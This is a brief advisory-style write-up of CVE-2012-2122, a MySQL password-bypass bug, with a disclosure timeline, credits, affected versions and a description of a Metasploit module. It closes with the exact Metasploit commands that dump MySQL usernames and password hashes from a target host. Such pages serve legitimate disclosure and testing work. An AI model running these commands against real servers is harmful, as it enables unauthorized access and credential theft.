Timeline :

Vulnerability discovered by Sergei Golubchik in April 2012
Bug reported to vendor by Sergei Golubchik the 2012-04-06
Public release of the vulnerability the 2012-06-09
Metasploit PoC provided the 2012-06-11

PoC provided by :

Yorick Koster
jcran

Reference(s) :

CVE-2012-2122
Oracle MySQL BUG 64884
Oracle MySQL 5.1.63 Changes
Oracle MySQL 5.5.24 Changes

Affected version(s) :

Oracle MySQL versions before or equal to 5.1.61 (on some platforms)
Oracle MySQL versions before or equal to 5.5.24 (on some platforms)

Tested on Fedora release 16 (Verne) with :

5.5.23 MySQL Community Server

Description :

The targeted username will need to have allowed remote connections, like :

grant all on *.* to root@'%' identified by 'password';

This module exploits a password bypass vulnerability in MySQL in order to extract the usernames and encrypted password hashes from a MySQL server. These hashes ares stored as loot for later cracking.

Commands :

use auxiliary/scanner/mysql/mysql_authbypass_hashdump
set RHOSTS 192.168.178.43
set USERNAME root
run